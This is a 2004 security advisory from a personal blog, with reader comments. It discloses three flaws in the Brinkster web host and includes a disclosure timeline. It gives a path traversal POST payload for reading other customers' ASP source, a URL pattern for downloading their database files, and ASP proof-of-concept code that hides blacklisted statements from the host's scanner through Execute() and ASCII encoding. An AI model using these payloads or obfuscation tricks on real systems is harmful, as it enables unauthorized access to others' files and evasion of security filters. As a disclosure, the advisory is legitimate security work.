Brinkster Multiple Vulnerabilities

08.02.2004

Okuyucu : 6.853
Günlük Okuyucu : 4,3
- ------------------------------------------------------
BRINKSTER MULTIPLE VULNERABILITIES
- ------------------------------------------------------
Online URL : http://ferruh.mavituna.com/?435

1. Retrieving other users ASP Source Codes
Severity: Highly Critical

2. Accessing Database Files
Severity: Medium Critical

3. Skipping Brinkster Code Controls
Severity: Low Critical


- ------------------------------------------------------
ABOUT BRINKSTER;
- ------------------------------------------------------
Brinkster is a popular free and paid Windows based web hosting company with many customers www.brinskter.com

- ------------------------------------------------------
VULNURABLE;
- ------------------------------------------------------
Currently (1/26/2004) Brinskter.com is vulnerable;

- ------------------------------------------------------
1.RETRIEVING OTHER USERS ASP SOURCE CODES
- ------------------------------------------------------
Any valid user can access other users source codes just by know file names. So an attacker can access ASP Source Codes, database passwords and other information in source codes.

This problem is related with Brinkster File Manager (http://www.brinkster.com/FileManager.asp). File Manager Edit page
(http://www.brinkster.com/FileManagerEdit.asp) allows an attacker to access other user's files by modifying POST requests.

	------------------------------------------------------
	URL	: http://www.brinkster.com/FileManagerEdit.asp
	POST	: faction=editfile&file2edit=%5C..%5C[VICTIM USERNAME]%5C[FILE
TO READ AS TEXT]
	------------------------------------------------------

- ------------------------------------------------------
2. ACCESSING DATABASE FILES
- ------------------------------------------------------
If you know the name of any Brinkster user database file you can download it. (You can find database name form source code -see:first vuln.-). 

	------------------------------------------------------
	Database URL;

http://[BrinksterServer].brinkster.com/[Username]/db/[DatabaseFileName
]
	------------------------------------------------------


- ------------------------------------------------------
3. SKIPPING CODE CONTROLS
- ------------------------------------------------------
Brinkster does not allow some code snippets in ASP files for server performance. Like "Server.Scripttimeout = 8000". Brinkster File Manager automatically scanning your uploaded source code and if it find any restricted keyword, it will delete your uploaded file.

You can skip this by using ASP built-in Execute() function. This function is not in Brinkster keyword blacklist. So write a simple decoder and encoder for your code and use it by Execute() function.


	------------------------------------------------------
	Proof of Concept;
	------------------------------------------------------	
	1) Simple Method without Execute();
	<%
	 On _
	 Error Resume Next
	%>

	2) Another Method with Execute();
	<%
	Dim onErrorStr
	onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s u m e-N e x t"
	Execute(Replace(Replace(onErrorStr," ",""),"-"," "))
	%>


	3) Another one with a Ascii values and Execute();
	This code allows you set "Server.Scripttimeout";
	<%
	Dim converted
	Const errStr =
"083101114118101114046083099114105112116084105109101111117116032061032
057048048048048048048048048 "
		converted = Asc2Str(errStr)
		Execute(converted)

		Response.Write converted	

		Function Asc2Str(byVal text)
			Dim converted, character, i
			For i = 0 to Round((Len(text)-1)/3,0)
				If Len(text) > 2 Then
					character = Chr(Left(text,3))
					converted = converted & character
					text = Right(text,Len(text)-3)
				End If
			Next

			Asc2Str = converted
		End Function
	%>
	------------------------------------------------------
	// -- 
	------------------------------------------------------



- ------------------------------------------------------
HISTORY;
- ------------------------------------------------------
01.01.2004 - Discovered
01.18.2004 - Vendor Informed
02.08.2004 - Published

- ------------------------------------------------------
Vendor Status;
- ------------------------------------------------------
2 e-mails, any answer.


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

bu dökümanın Türkçe'sini de yayınlar mısınız?

[ # | 08.02.2004 ]

ewt bu dökümanın türkçesini yayınlarsanız sevinirim.

Shiva Shidapu [ # | 09.02.2004 ]

Dokümanın Türkçesi;
http://ferruh.mavituna.com/article/?437

Ferruh Mavituna [ # | 09.02.2004 ]

ilgin için teşekkür ederim.. @Ferruh

Shiva Shidapu [ # | 09.02.2004 ]

Can you show me example about BRINKSTER MULTIPLE VULNERABILITIES. I have an account in Brinkster. Can I show other user Password?

Example [ # | 20.02.2004 ]

You can't see other users accounts but you may can access other users files, databases and vice versa.

Ferruh Mavituna [ # | 20.02.2004 ]

My friend can show my password form my account. In Brinkster my account is QUANGND and he can show password like *****

I don't know how to exp. [ # | 20.02.2004 ]

Konu brinkster le alakalı oldugu icin size yazma geregi duydum ziraa nette brinksterle ilgili turkce yazı bulamadım
benim brinksterde bir sitem vardı sitenin yedegide bir hdd de idi hdd bozuldu ve icindeki her seyim gitti sitemde yaptıgım projelerim var en azından onları alırım diye dusunuyordum ki brinksterde dosyaları kendi adıyla download edemiyorsun. kaldıki 30 mb binlerce dosya . bende 3,5 + 3,5 toplam 7 dolar verdim 1 aylık ftp aldım amacım brinksterdeki dosyalarımı almaktı ftp programı ile girdim ftp ye ama hic dosya yok
ingilizce bilmedigim icin kimseye derdimi de anlatamıyorum şimdi benim ne yapmam lazım ftp yi bugun aldım acaba ilerde mi acılacak yoksa yanlıs bir sey mi yaptım ilgilenirseniz memnun olurum

MERT MURAT [ # | 20.03.2004 ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Advisories » Brinkster Multiple Vulnerabilities

RSS Feed site statistics RSS Subscribers
Siteyi E-mail ile Takip Et

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında